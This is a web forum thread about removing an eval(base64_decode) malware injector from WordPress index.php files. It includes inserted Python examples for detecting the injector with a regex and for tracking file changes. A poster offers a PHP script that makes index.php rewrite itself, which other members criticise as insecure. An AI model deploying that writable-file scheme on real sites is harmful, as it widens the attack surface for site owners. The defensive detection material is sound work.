Hello, I have a few websites on my webhosting. They are based on WordPress. For the last few days my websites have been infected by malware. Every main index.php in the domain root folder is infected with code like this:
eval(base64_decode('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'));
I scanned it through http://www.sucuri.net, and it says that my website is infected with MW JS Depack. I found this article: http://www.victorciobanu.com/how-to-remove-mwjsdepack/ but I think it's different, because I can't find any problem with my wp-settings.php. If you have any suggestions about this, let me know.
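To show the kind of check a defender runs over a webroot for the pattern quoted in this post, here is an added example (Python, not code from the original thread): it walks a directory, flags eval(base64_decode(...)) constructs (also the gzinflate/str_rot13-wrapped variants of the same family) and decodes the captured blob only into a text preview for a human to read. The sample files, the payload and the directory layout are constructed for the demo.

```python
import base64
import os
import re
import tempfile

# The injector family quoted in the post: eval(base64_decode('...')), sometimes
# wrapped in gzinflate()/str_rot13(). The blob is captured, never executed.
INJECT_RE = re.compile(
    r"eval\s*\(\s*(?:gzinflate\s*\(\s*|str_rot13\s*\(\s*)?"
    r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)",
    re.IGNORECASE,
)


def decode_payload(b64: str) -> str:
    """Decode the captured blob to text for inspection; nothing is executed."""
    try:
        raw = base64.b64decode(re.sub(r"\s+", "", b64), validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return "<not valid base64>"
    return raw.decode("utf-8", errors="replace")


def scan_php_source(src: str, path: str = "<string>") -> list:
    """Return one finding per injector match: file, line, decoded preview."""
    findings = []
    for m in INJECT_RE.finditer(src):
        line_no = src.count("\n", 0, m.start()) + 1
        findings.append({
            "path": path,
            "line": line_no,
            "decoded_preview": decode_payload(m.group(1))[:120],
        })
    return findings


def scan_tree(root: str) -> list:
    """Walk a webroot and scan every PHP-like file."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                findings.extend(scan_php_source(fh.read(), path))
    return findings


# Constructed sample: a harmless payload stands in for the real blob, which is
# far longer. CLEAN mimics a stock WordPress index.php.
SAMPLE_PAYLOAD = base64.b64encode(b'echo "constructed sample payload";').decode()
INFECTED = ("<?php eval(base64_decode('" + SAMPLE_PAYLOAD + "')); ?>\n"
            "<?php\n// real index follows\n")
CLEAN = "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');\n"


def demo() -> list:
    """Build a tiny constructed webroot in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "wp-content"))
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write(INFECTED)
        with open(os.path.join(root, "wp-content", "clean.php"), "w") as fh:
            fh.write(CLEAN)
        return scan_tree(root)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['path']}:{f['line']}: eval(base64_decode) -> {f['decoded_preview']!r}")
```

Run it against a copy of the webroot rather than the live tree; the decoded preview tells you what the injector does (a remote include, a redirect, a spam page) without ever running it, which is what you need when deciding whether the rest of the site was touched.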
It can happen due to a number of reasons:
1. Incorrect permissions on your website files.
2. Weak FTP passwords.
3. A malicious script on your domain (under plugins/templates) injecting this code into your files.
4. It could be on the server your website is hosted on, injecting not only your website but others too.
etc..
I think you are on a shared hosting server, and it is best for you to contact the hosting provider and ask them to check the server logs to find out how this happened. If they don't provide proper help, it's better to change the hosting company OR get your own server (VPS/dedicated) so you can have proper security settings and then host your websites.
I agree with Madaboutlinux. Add the toughest permissions to the root directory so that no user can update the files.
Hi, since the malware keeps coming and injecting lines of code into your files... I recommend a full scan of the server and a check of the permissions on the directories and files. While changing the permissions, ensure that it won't affect the sites' working.
I use this....

<?php
/*
HEY ALL... This indexing method will remove all those malware attackers who try and add code to the index files, by changing the name of a good working non-infected index file to index_REAL.php or whatever. Then create a new main index.php file that will contain only these 3 lines:

<?php include("index_REAL.php") ; ?>

So here's where the magic happens... the "index_REAL.php" file will rewrite the index file every time it gets accessed, so any info that was changed will be restored with the original code, by inserting this code at the end of "index_REAL.php":

<?php
$File = "index.php";
$Handle = fopen($File, 'w');
$Data = "<?php include(\"index_REAL.php\") ; ?>";
fwrite($Handle, $Data);
fclose($Handle);

NOTE!!! BE CAREFUL NOT TO DELETE THE ORIGINAL. "index_installer.php" is a self-deleting installer file. If lost, a new copy can be downloaded from: http://tmgraphics.biz/standard/index_installer_BACKUP.php
Any questions, please email me at however you will have to enable the unlink installer line at the bottom of the script.
*/

$origindex = "index.php"; // assuming it's .php
$realindex = "index_REAL.php";
echo $myname = basename($_SERVER['PHP_SELF']);

if (file_exists($realindex) == 0) {
    echo "pass1";
    if (file_exists($origindex) == 1) {
        echo "pass2";
        rename($origindex, $realindex);
        // write the new stub index.php that only includes the real one
        $Handle = fopen($origindex, 'w');
        $Data = " <?php include(\"$realindex\") ; ?>";
        fwrite($Handle, $Data);
        fclose($Handle);
        // append the self-rewriting code to the end of index_REAL.php
        $Handle = fopen($realindex, 'a');
        $Data = "<?php \$File = \"$origindex\"; \$Handle = fopen(\$File, 'w'); \$Data = \"<?php include(\\\"$realindex\\\") ; ?>\"; fwrite(\$Handle, \$Data); fclose(\$Handle); ?> ";
        fwrite($Handle, $Data);
        fclose($Handle);
        echo "pass3 <a href= \"$origindex\"> GOTO INDEX</a>";
    }
} else {
    echo "you are already SAFE!!!, '$realindex' ALREADY EXISTS!!";
}
sleep(2);
unlink($myname); // the installer deletes itself
?>
No, no, no, no, no, no, no, no and HELL NO. This code is utter garbage, and provides no more "security" than actually fixing the problem on the server. Not to mention that the code itself is horribly written. Just fix the problems on the server, and forget about "magic mushroom cloud fixes" like this one. I'm just gonna go hit my head on my desk now.
Gotta go with @PoPSiCLe on this one; because allowing PHP write access to executable files couldn't possibly open up even bigger security holes than already exist... Of course that it's a spammish bump of a four year old thread doesn't help with the credibility a whole lot either.
Just remove the malware code from index.php and use the chattr command to protect the file from modification. Even the owner won't be able to make changes without disabling it.
To lock:
chattr +i /home/username/domains/yourdomain.com/public_html/path/to/file
To unlock:
chattr -i /home/username/domains/yourdomain.com/public_html/path/to/file
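Locking the file is one half of the job; the other is knowing when something in the webroot changed again. As an added example (Python, not from this thread), here is a file-integrity baseline: hash every tracked file once, store the result outside the webroot, and on each later run report what was modified, added or removed. The demo webroot, the injector line and the dropped file are all constructed for the demo.

```python
import hashlib
import os
import tempfile

# File types worth tracking in a WordPress root; adjust to taste.
TRACKED_SUFFIXES = (".php", ".phtml", ".inc", ".htaccess", ".js")


def sha256_file(path: str) -> str:
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> dict:
    """Map every tracked file (path relative to root) to its SHA-256 digest."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(TRACKED_SUFFIXES):
                full = os.path.join(dirpath, name)
                baseline[os.path.relpath(full, root)] = sha256_file(full)
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Classify the differences between a stored baseline and a fresh walk."""
    return {
        "modified": sorted(p for p in baseline
                           if p in current and current[p] != baseline[p]),
        "added": sorted(p for p in current if p not in baseline),
        "removed": sorted(p for p in baseline if p not in current),
    }


def _write(root: str, rel: str, text: str) -> None:
    full = os.path.join(root, rel)
    os.makedirs(os.path.dirname(full), exist_ok=True)
    with open(full, "w") as fh:
        fh.write(text)


def demo() -> dict:
    """Constructed run: baseline a tiny webroot, then simulate the symptom
    from this thread (index.php prepended with an injector, a new file
    dropped under uploads) and report what changed."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "index.php", "<?php require('./wp-blog-header.php');\n")
        _write(root, os.path.join("wp-content", "plugins", "x.php"),
               "<?php // constructed plugin stub\n")
        baseline = build_baseline(root)
        # 'Y29uc3RydWN0ZWQ=' is only base64 of the word 'constructed'
        _write(root, "index.php",
               "<?php eval(base64_decode('Y29uc3RydWN0ZWQ=')); ?>\n"
               "<?php require('./wp-blog-header.php');\n")
        _write(root, os.path.join("wp-content", "uploads", "dropped.php"),
               "<?php // constructed dropped file\n")
        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Keep the baseline where the web server's user cannot write (not under public_html) and refresh it only after a deliberate update; a cron job that runs compare() and mails a non-empty result catches the reinfection the original poster describes, including new files in upload directories that chattr on index.php alone would never flag.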
Say what you will; after repeated malware attacks, thank god I have not had an issue with spammers altering my index file since. It's only garbage if it doesn't work.
Eh, no. It's garbage when it's garbage. That code is horrible, mostly in what it does and how it's written. Add to that that there is no real security in it at all, and the fact that there is NO WAY the normal index.php file should be any more vulnerable than index_blah_something_not_the_real_index.php - a PHP file is read ON THE SERVER - nothing in it should be accessible from the outside, apart from the HTML output to the browser. I don't get how "my index file is full of malware" doesn't begin to light up some bulbs that MAYBE there's something wrong ON THE SERVER - either the config of the host, or some security flaws in the code running on it, or just plain old stupidity (which I will guess is a pretty strong contender here).
BTW - there are [ code ] bbcodes on this forum. No need to paste code directly in a post, and no, it doesn't help that you color it blue.
Besides - for that junk code - this does the exact same thing, in about 1/3 of the lines of code:

<?php
if (!file_exists('index_REAL.php')) {
    if (file_exists('index.php')) {
        rename('index.php', 'index_REAL.php');
        // $h = fopen('index.php', 'w');
        $data = "<?php include('index_REAL.php'); ?>";
        file_put_contents('index.php', $data);
        // \$ keeps the inner $data literal so the stub is written out, not interpolated
        $data = "<?php \$data = '<?php include(\'index_REAL.php\'); ?>'; file_put_contents('index.php', \$data); ?>";
        file_put_contents('index_REAL.php', $data, FILE_APPEND);
    }
} else {
    echo 'You\'re already "safe" - index_REAL.php already exists';
}
echo '<a href="index.php">GOTO INDEX</a>';
?>